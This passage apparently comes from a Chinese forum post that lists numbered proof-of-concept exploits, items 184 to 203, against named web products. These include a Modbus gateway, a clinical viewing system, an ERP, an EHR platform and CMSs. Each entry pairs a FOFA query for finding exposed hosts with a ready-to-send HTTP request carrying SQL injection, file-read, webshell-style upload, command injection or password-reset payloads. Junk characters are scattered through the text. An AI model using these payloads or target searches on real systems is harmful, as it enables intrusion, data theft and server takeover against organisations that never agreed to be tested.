  j  f& e9 V! J% I! rAccept-Charset: utf-8# g+ y" g7 s3 |- o+ x
Accept-Encoding: gzip, deflate
& l  E- B% \& o" U; ?& zConnection: close
% }( s4 m4 T2 g: G& N2 R, ?7 K
4 H2 i0 h! a1 m) Z! Q1 q4 J1 C5 Q9 f! f6 B( _
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加8 ]: d3 c; @' O! k" k% [8 s# m1 n5 ~
FOFA:server="SunFull-Webs"* E  v! p5 k5 n& W$ \2 V1 n
POST /soap/AddUser HTTP/1.1$ q* G1 |2 v$ c$ O0 g
Host: your-ip4 l$ y, i8 c/ v7 a' ~
Accept-Encoding: gzip, deflate% ~9 Q  x8 S9 |) p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
7 @1 [4 z; p9 P. KAccept: application/xml, text/xml, */*; q=0.01
2 B' W5 d: n( p3 `# b* ?Content-Type: text/xml; charset=utf-8
! m. ^' i, T5 T) SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, I1 b( O$ ~& X& {% n- f( T
X-Requested-With: XMLHttpRequest/ Z" r( A0 `% b' |- \; A, Z, ~# h
" B5 O+ G& ~5 n# z! x$ h
7 s: q2 M8 \% V- ]7 z% g
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
/ e/ V3 |: Y* V* H0 ~
+ E1 _0 ]$ U4 P: \% S+ W8 L( y
5 k3 V6 g/ G, E0 D3 b5 j. F6 g185. 瑞友天翼应用虚拟化系统SQL注入
( T8 s) D& h  ^' S6 Oversion < 7.0.5.1$ j( n3 |7 g* L! \+ S7 Y
FOFA:app="REALOR-天翼应用虚拟化系统"$ k2 |& Q! w% Z6 e" G
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
+ B5 X3 `& x; _( {  pHost: host
2 O  C' \9 n7 Z+ ]4 Q0 \% o2 w
# L+ f1 _/ h  g6 Z; k" G7 e$ r
( X. \" i; J* J- e/ Z3 N! R186. F-logic DataCube3 SQL注入
) J5 ~: T) c5 {. c7 l  I) ]  qCVE-2024-31750% I) ~' N6 B0 n# Y! @6 z
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
" t0 |) m: l8 l0 t4 _9 lFOFA:title=="DataCube3"
0 [( w3 L0 R  kPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
: ]6 ?/ i) R4 Y" VHost: your-ip
: X% i" y0 n+ z8 N2 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.02 l" N4 n, e4 `5 Q* @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
* Y/ q3 G0 V" @3 h; xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' y, W9 ]/ p# |8 rAccept-Encoding: gzip, deflate7 N% d; _5 [) t8 v' y9 _4 R, i9 [6 }. c
Connection: close
$ g$ S1 E+ H9 |$ `Content-Type: application/x-www-form-urlencoded5 V( D% O% y! l( P

: L4 l% _; q' J" k; g5 Y  ireq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
# \( q! i3 e* U3 U/ r2 m9 b: |7 l+ z/ P* K: d
& i$ |# b+ {) k, y3 `3 r6 q8 V
187. Mura CMS processAsyncObject SQL注入
" |7 [( R8 o5 g( V; q' eCVE-2024-32640$ j( F$ O9 K9 a9 V: R
FOFA:"Mura CMS"
- `4 m& a/ F# [/ y- C" @POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1$ @! P8 i: l! R. }$ E
Host: your-ip* ^  C5 X  N, h/ I3 m7 S
Content-Type: application/x-www-form-urlencoded3 \. \9 A) b' h  m
3 z! |, A+ ^1 H8 h  V* g7 _

+ p$ Q# L3 C8 z" a6 u7 i  i) c' eobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
5 I3 {5 C. L% y7 g( F' h
! g3 {- `) U  p7 w7 X; c0 U( D, R
& m2 d1 ?2 ?; Z5 n2 X3 k188. 叁体-佳会视频会议 attachment 任意文件读取( o9 [4 V: p7 P* R7 C1 k1 \, ?8 G: H
version <= 3.9.7: }( x3 @/ q( p6 ^6 x/ M
FOFA:body="/system/get_rtc_user_defined_info?site_id"
. v; v& w+ v- H3 MGET /attachment?file=/etc/passwd HTTP/1.17 n& K; q1 _: h& I! p3 Z2 D
Host: your-ip
& d3 c  ]% Y( L/ ^% P. y7 [: E7 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; i; g4 B. X, r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 }: B0 K/ b& mAccept-Encoding: gzip, deflate
& q# I' Z3 c1 g0 q. Q6 s- ]3 T9 uAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 _) s0 p* V! ]3 BConnection: close! |5 X; t$ O3 Y2 v& j
# h2 Z9 k7 G1 y3 C3 R
* x; q( w- a. W- Z6 I
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
! X8 }; g5 M' Z7 M% V& rFOFA:app="LANWON-临床浏览系统"4 v  w3 Y  |; L  }8 s' D% L5 W
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1; ]" @) J9 V5 k9 t/ W
Host: your-ip" [3 _: ~2 q4 z1 C3 x- b) h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 l. c9 M1 I% `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. }# }' [. J2 s; C
Accept-Encoding: gzip, deflate
! }% O1 {- Z: M- `1 m# V; rAccept-Language: zh-CN,zh;q=0.9& D! c  e6 q3 z$ S
Connection: close
2 k$ R' t6 G, f) j- o" m: N% v3 p( H4 T: ~1 A9 J% d" h  Y; X% U
6 v! H1 x3 j7 U# v$ b/ p1 t
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
- {2 C0 D$ Z9 S! K# k- Y) {- iFOFA:title=="短视频矩阵营销系统"
8 |) K" u& S' t* O2 Q/ LPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
$ r) D4 `7 @. K4 _Host: your-ip
( B! z9 `/ X6 f5 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36+ h0 s# x( y8 o7 _! v+ ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 l% o' Y1 n- n* v3 x; x
Content-Type: application/x-www-form-urlencoded5 U6 T( H) o6 m6 i
Accept-Encoding: gzip, deflate
/ K% L/ g+ ~3 x" kAccept-Language: zh-CN,zh;q=0.9
4 D. _3 i- y8 Z7 G
( \$ f. p3 l) u0 N7 Rpoi=file:///etc/passwd5 A8 c# j) z9 }- [9 j6 a- Y8 Q, i

0 A- `5 ^6 V( U2 S: R: o
0 V6 L* r. v9 X! k3 T: _191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入% w$ Y$ A; u$ O- K. d3 P; J3 r. G% n% e
FOFA:body="/CDGServer3/index.jsp"0 w1 [( H7 u5 x" ?
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
; S" ~# d) \5 [Host: your-ip& z3 t# p' P3 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 A' l& Y0 H! w6 x. l! PContent-Type: application/x-www-form-urlencoded
+ p2 V) K7 z9 r
, [  O% |- F- Hcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=# I. B( ~' c! q" d/ h6 d4 |; L: f! Z

/ H4 B, X- ~; Z( r6 N% r# r
. y! G( @3 z% f3 n# M$ W+ P- k192. 富通天下外贸ERP UploadEmailAttr 任意文件上传7 D6 g& s( d4 q) E, s! \& g
FOFA:title="用户登录_富通天下外贸ERP"
$ Q9 n2 E9 N! A! D3 _, j( K+ ?& qPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
1 a" T0 L4 A0 {% S' tHost: your-ip
- i: t4 I- b( \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.367 ?9 I  M7 n4 a" A
Content-Type: application/x-www-form-urlencoded
- [0 B4 k" L* G/ f- z8 |
, [$ L" ]2 q* _4 v$ J. h9 r5 O7 ]% M  l- \' o. z
<% @ webhandler language="C#" class="AverageHandler" %>
, i; g& {) o$ i& ?0 I) l! Ousing System;
5 ]! F: d7 T* \7 r5 a( [" wusing System.Web;
+ m0 n6 b4 o, u* a# h( I0 Spublic class AverageHandler : IHttpHandler/ c! [- @+ ]7 T) E: N* [* t' R
{
) f6 C( t3 K0 }/ r- N* |6 J8 f( k8 Npublic bool IsReusable1 S/ Z$ F% h* q4 B7 W
{ get { return true; } }, X8 E7 F' T. L! ^' [' f3 V
public void ProcessRequest(HttpContext ctx)
7 Q2 K1 P; ?+ Z0 k; \{
  \: e: R: t% j' V/ J  T/ ^ctx.Response.Write("test");, N2 g! _/ u2 t- D7 {6 \4 Y0 G
}( z# j  |7 Q) o* m9 h3 L: \, ]
}
7 Q) `* u! w7 w  s, x- `( w: b5 J# o1 }% f0 V) N' ?: [
) x$ j3 l- ?' v# c! M
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
8 [, H* l& P7 R9 u- X9 r. U  @9 oFOFA:body="山石云鉴主机安全管理系统"
# P$ Y9 G6 _7 G1 }0 c& g; kGET /master/ajaxActions/getTokenAction.php HTTP/1.12 x0 S# n: D+ H
Host:$ H  u  x. b! |+ k! I& c8 F1 ^7 r
Cookie: PHPSESSID=2333333333333;- o: z# J, e; e
Content-Type: application/x-www-form-urlencoded  L2 Z8 @$ _* g# z# Z9 k8 n
User-Agent: Mozilla/5.0
& G4 A  V( u7 N# l5 R1 c
; D: g/ F1 g3 z% |- J4 x' J) s5 X) p6 t( ~  f
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
$ \7 S* V6 g, v1 s, W2 C' }; XHost:3 e" L  u& F6 H9 V: _
User-Agent: Mozilla/5.0
0 w2 ~- i2 S5 PAccept-Encoding: gzip, deflate* a! S, |1 s4 M% U/ D7 r5 W6 H
Accept: */*5 d$ ^. C" ^) A
Connection: close
5 P( |& c. {. P; b! ^0 O4 R* ACookie: PHPSESSID=2333333333333;4 a! \* Y' ]3 Q" A8 {/ p- h
Content-Type: application/x-www-form-urlencoded
& \, u6 H) r% t1 X, kContent-Length: 84
" {* V: B9 n- A5 l
, ^$ o0 Y4 x* M2 Y- v; lparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
/ \# d4 q. Y6 R9 _3 l+ l, Z3 a7 d; V; a2 _' O' `
, ^. S3 c* P3 K
GET /master/img/config HTTP/1.1
* Z3 a5 ^4 e# c( |. q7 zHost:1 K& c, X4 i  b' h3 p
User-Agent: Mozilla/5.0+ K" Z( _2 Z  N/ I6 b/ G7 d0 A, Q

. b3 j1 X. P; S! m6 I6 R# N! K( X8 u' Q2 ?; R8 ]
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
7 i1 p( ?; D& r6 N2 cFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在4 l  ^) _. E+ g6 V

! G6 l3 Q( h7 V9 L7 |) zPOST /servlet/uploadAttachmentServlet HTTP/1.1# l5 k  ^1 v* v. L6 R5 Z& M
Host: host1 o4 {/ e1 ?; \/ L8 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
+ N' L3 I5 z; LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 l+ g8 e5 {2 f% _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 h+ Q+ o( v6 U" h% T& P( i# w! g
Accept-Encoding: gzip, deflate. V- Q7 @4 n* \6 L. O
Connection: close9 H. A! O) C( Q6 Q" J7 X5 n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk& U8 W: V4 i7 G/ Z9 F  \, D
------WebKitFormBoundaryKNt0t4vBe8cX9rZk5 G  s: F3 f! b

% f! p. E7 E- Z. q2 dContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
* f& j2 K. M; r3 KContent-Type: text/plain
9 B/ j# A+ N. g; F5 p4 J5 c4 A' q2 w<% out.println("hello");%>
, `1 g& G8 u& U: t------WebKitFormBoundaryKNt0t4vBe8cX9rZk" D% A2 g: w# B" @5 y
Content-Disposition: form-data; name="json"% a; Y. S, s' e5 K7 C( _7 o
{"iq":{"query":{"UpdateType":"mail"}}}
. I5 E) ~1 @$ A. |------WebKitFormBoundaryKNt0t4vBe8cX9rZk--; Q& C8 p& p% q9 d+ a$ f" w

% X) v3 z  m* n+ x: q1 P
5 V6 r( A) `; Z' t  v195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
# ~4 p. W1 P* ?# N/ i1 OFOFA:title=="飞鱼星企业级智能上网行为管理系统
0 ~1 h' h3 D2 H9 P( m# F, b3 EPOST /send_order.cgi?parameter=operation HTTP/1.1+ i8 w& [; S. @/ n# N" q$ V
Host: 127.0.0.1
& d: |6 b; O2 d3 H1 iPragma: no-cache1 I7 l. d. r5 D5 ~8 A
Cache-Control: no-cache
/ P3 W& j2 ]* [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
! k* V1 P8 b& T/ |0 v% ^Accept: */*
' J. G  M# [. S. h+ M" g5 m3 ]7 `Accept-Encoding: gzip, deflate' W( S2 R1 j( S) F" ~2 y: l
Accept-Language: zh-CN,zh;q=0.9
2 C  t% n" W. V; n6 jConnection: close5 h9 J# U3 J6 ]* [; o
Content-Type: application/x-www-form-urlencoded7 h! c5 H% s1 T5 C( g6 i4 Y# v7 J
Content-Length: 68! Y6 f: K* z8 f* ]. f

7 O; c) Z% f4 D{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
9 G. Q2 J2 T. w8 j! Q
5 P. m( Q" l: t" W
! p- \$ q6 j; @# |" q196. 河南省风速科技统一认证平台密码重置6 M+ q/ U8 e: A
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"* \" R5 ]1 r. T4 z, p% Y$ J) ?; X
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1. M2 e. i9 F0 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 L6 E+ M* E( \8 U8 `) F* m- SContent-Type: application/json;charset=UTF-8; P4 `% m" S) y, @
X-Requested-With: XMLHttpRequest
' U' n  T5 f: P. j0 kHost:
: Z9 F) D4 _& aAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2; ~$ B- n3 ~6 h. O6 b
Content-Length: 458 v* z/ G  E, M+ `
Connection: close
8 V. P/ S7 B  W" r5 e7 ?* y4 G4 e; n5 H
{"xgh":"test","newPass":"test666","email":""}
: w2 J' H$ m# R4 P/ v2 G4 i4 F) v: D* s% p

3 j9 {' v) O- o. y! a
, h& j3 }% z! ~6 ?6 t197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
2 w' J+ g, t! }- f) jFOFA:app="浙大恩特客户资源管理系统"
9 R5 z2 ]+ K* v& B  N; LGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1. G$ z+ E; Y! R
Host:
& x- h1 ^- o, t; x( EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
* b9 ~! G4 ~2 `3 o% YAccept-Encoding: gzip, deflate
- g6 W. g3 c0 s+ oConnection: close+ s. m1 ^# Q, `3 \5 O: |' o- O

8 s$ j0 I7 Z5 u7 Y* Z8 v
! E. A; Z. _* }& P. r9 x. U6 T' N* R+ a# w+ p( q) b
198.  阿里云盘 WebDAV 命令注入8 F* g3 _8 G" l" b' C
CVE-2024-29640
6 f5 ~$ H6 ], W: h' B% U6 SGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
. L( ]% M+ B; A( @; w1 m( Z8 u2 pCookie: sysauth=41273cb2cffef0bb5d0653592624cf643 r( n' L) ^4 @  \, J7 h( I3 U9 k
Accept: */*6 B1 E+ _! X+ I) D9 k6 p( }
Accept-Encoding: gzip, deflate
0 p1 z8 [  P& m, gAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.68 a1 K. {8 [/ t& e4 |8 W  G) Z- b
Connection: close
- U. C- g1 h9 r6 M
* R3 E/ K# \) o3 \) Y+ h( L2 a6 q% q: i; ?7 B6 T, F# ?, c
199. cockpit系统assetsmanager_upload接口 文件上传
' p0 ~. E( V$ Q) t; [- t4 r
! t3 x( |3 d2 r, p- g1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:4 n( |7 ?! w8 @- a
GET /auth/login?to=/ HTTP/1.1
+ s2 A: P- V! \9 u& ^& S) I. ^
) e. s+ L+ j/ v' I- ?0 `响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
8 L% g! o. G9 L8 S& d; |/ j
2 F' Y3 Q! ~: }% V% s2.使用刚才上一步获取到的jwt获取cookie:3 ?4 o6 Q5 h9 C3 M% q1 l

0 C) \+ \4 _( [* W2 QPOST /auth/check HTTP/1.1
4 |; U, w0 n# p4 q, j  kContent-Type: application/json$ u: ?# a. R! e4 b5 J

& u5 x/ G* S& l8 X' M. y{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}, b+ l3 S* ?/ R' w
; [; X/ W# f+ L$ p  U
响应:200,返回值:
/ T2 W7 p- `8 }# A& `. r' O. F- kSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/. K& d1 j/ Q8 B6 e, i+ y
Fofa:title="Authenticate Please!"
9 K, V  M  G+ [3 `POST /assetsmanager/upload HTTP/1.1
. s# E' g+ y) S* |: ~Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
7 z6 K6 @# U9 n/ z) \3 c& g5 uCookie: mysession=95524f01e238bf51bb60d77ede3bea920 a. @$ {* f0 E% p  }; j
4 A; Z5 e% P; D8 n
-----------------------------36D28FBc36bd6feE7Fb3
( _/ O3 x0 C- z" ?: j1 M- OContent-Disposition: form-data; name="files[]"; filename="tttt.php"( \$ R4 r- I% W9 Y
Content-Type: text/php
' q8 f; g7 l8 Y% v: z" _* Q& @, e) c
<?php echo "tttt";unlink(__FILE__);?>
" e: ^4 G5 u" _-----------------------------36D28FBc36bd6feE7Fb38 K) E+ N9 H- p6 R
Content-Disposition: form-data; name="folder"7 Q) G  Y, m7 g3 C

, R& d- `& r3 b! a-----------------------------36D28FBc36bd6feE7Fb3--
6 R, d8 `' Z) d8 i- U
+ k; z' I+ @' h7 D0 L8 |# I& s! d4 _! H. N+ K& b1 }4 F5 G
/storage/uploads/tttt.php
. D- F8 |, R* o" d8 x
4 `- u' R/ k! Q( {200. SeaCMS海洋影视管理系统dmku SQL注入* U3 [& Q0 g- S: u
FOFA:app="海洋CMS"5 b! Y( y$ k% k" n
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.15 R0 J! ]# |# a
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s( v) @+ i4 v9 m: N4 n5 }
Upgrade-Insecure-Requests: 12 V2 C4 E1 L# M* H5 A3 W
Cache-Control: max-age=0
7 I, H# R' P3 }4 t/ n$ b! w* z0 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 V9 \8 k' B. |
Accept-Encoding: gzip, deflate
$ E! h$ x, k0 y: \( z7 o0 c! CAccept-Language: zh-CN,zh;q=0.9& S: G: @- ?6 i+ M
8 k1 i9 i1 ?( {# Y0 y
* z; i/ W2 f. |4 W( Z" n
201. 方正全媒体新闻采编系统 binary SQL注入
4 r" ]' f) Y  d. Q# @FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
$ X( t4 B8 q1 v+ m0 WPOST /newsedit/newsplan/task/binary.do HTTP/1.1
( O/ k2 }' p! x5 F, CContent-Type: application/x-www-form-urlencoded
, @% k% [1 n  t& U! c0 w- F; \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 M# J' C5 J3 `8 Q& r8 q3 d1 |Accept-Encoding: gzip, deflate
" i7 g* P! F/ qAccept-Language: zh-CN,zh;q=0.9
9 J9 w- E$ g* S6 [( a( oConnection: close% }. }  s$ r* x' S
) ~: S8 s0 ^) H) l8 k& a0 h2 L! q
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=19 Y- L6 V  N7 e- J

( i9 K6 d5 I+ ?; b9 q
4 g5 y' L6 F& f/ j3 U/ Y/ S202. 微擎系统 AccountEdit任意文件上传
8 y" H& M" P4 X& qFOFA:body="/Widgets/WidgetCollection/"
5 O$ Y4 p( J/ U2 J获取__VIEWSTATE和__EVENTVALIDATION值: o, Q7 l5 K2 U0 z! I- _
GET /User/AccountEdit.aspx HTTP/1.1
* z, M/ a9 K4 F; s9 jHost: 滑板人之家0 \7 y3 I- g9 i0 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
, K5 `, I1 N% }. b( b- e/ NContent-Length: 0
- Z9 `" E. r# d! i+ T& f. U. F7 v" @& z! F
- K1 D$ M0 [* C$ h- w" p
替换__VIEWSTATE和__EVENTVALIDATION值
' ?9 i) I3 ~' j# Y4 t# o7 xPOST /User/AccountEdit.aspx HTTP/1.1/ Q) Z( X6 U2 J' z* `6 [
Accept-Encoding: gzip, deflate, br) p& D9 |" H2 C, Q: Q
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
4 \% s  x, [. c# x. L" x/ i' ^
' }/ ?7 i9 r+ R0 B  Z! b8 Y6 r-----------------------------786435874t38587593865736587346567358735687
" P. b% ~" u% W* z2 t+ TContent-Disposition: form-data; name="__VIEWSTATE"* X' ]( v! a! F2 U1 b0 Y5 O+ X3 t
9 k3 X! }+ _2 Y( H3 N
__VIEWSTATE  j! N9 L& J# z
-----------------------------786435874t38587593865736587346567358735687* C6 M4 X3 j; `$ [' D1 g
Content-Disposition: form-data; name="__EVENTVALIDATION"- p" ^; e, {6 b7 o

* U) a- v& y: i6 J0 w4 x__EVENTVALIDATION
0 v5 L7 c/ U' M- b; `0 U/ Y-----------------------------786435874t38587593865736587346567358735687$ [& A6 p, j, w8 n: i& O
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
, P# K( l7 J5 S! x0 PContent-Type: text/plain1 n2 T: Y8 ~. \# x& J
& t. [7 p3 W6 g+ M; `
Hello World!( X+ x4 P5 q/ C- `& |4 A) a
-----------------------------786435874t38587593865736587346567358735687+ U4 f1 \6 b( g* h1 N
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"  I+ u8 c2 p, w% [, o

, a3 V$ i5 E" g; B+ h上传图片
: {# o+ S7 G4 Y& u( Z3 ^-----------------------------786435874t38587593865736587346567358735687
9 r  \9 b- N- |) B8 W' z) _Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"' ~2 G( c- w0 d% h; ]( @, n
+ x. Y+ H% k1 O
& d$ d8 V% y6 M* c
-----------------------------786435874t38587593865736587346567358735687/ Y3 x  D  y# l- z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"- x8 _5 T  W4 H1 z5 a
: Z0 d; R1 R% ^% n1 V$ C* k. ^
2 o' A. {$ q0 l' `9 i8 K' Z9 o
-----------------------------786435874t38587593865736587346567358735687--, ]3 P6 ?& R9 D( y/ P4 w+ i0 e
; |' N, l% n' H% {8 t" n2 b

3 E0 r# ^# j+ G  p/_data/Uploads/1123.txt
4 L/ o7 \3 y% N9 G0 P& X% b. [
' {  Z/ ]! }) `/ C: n2 T203. 红海云EHR PtFjk 文件上传
3 Q) M6 h! v* s0 LFOFA:body="RedseaPlatform"* H" \% j( F4 Z  t5 x) h6 N
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
7 ~& F& u2 J; Q- s* |Host: x.x.x.x* V% u  a/ _% l; E' C3 K6 z
Accept-Encoding: gzip4 g% G- H8 [% k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 K- ]8 R* I% ?+ d7 w7 ?  e6 p) @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4+ n  [& e, O7 o' ^* w
Content-Length: 210% F$ \: V& g$ F
" p3 x9 ~9 s' y
------WebKitFormBoundaryt7WbDl1tXogoZys4
0 J3 Y& ?6 N& R% d3 c1 @8 I7 x! ZContent-Disposition: form-data; name="fj_file"; filename="11.jsp"+ U( J) z5 Z8 [+ u) x
Content-Type:image/jpeg, V6 `: e- K& E

6 J2 B; g+ s" G* c: ~  [& T' R<% out.print("hello,eHR");%>
# ?  Z9 i# K! [( X6 O------WebKitFormBoundaryt7WbDl1tXogoZys4--
: Y& b; e: c- w
$ H& r! o. b) W
9 z3 [- [" {% m1 {* h: ]$ f! E) q
( n: x/ A4 }( B/ T+ k* n( S) C
  f0 ?3 N0 i5 e, L- |* r$ A' m* e' C

* E: b9 v% q8 D" ^4 {! d% J, I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表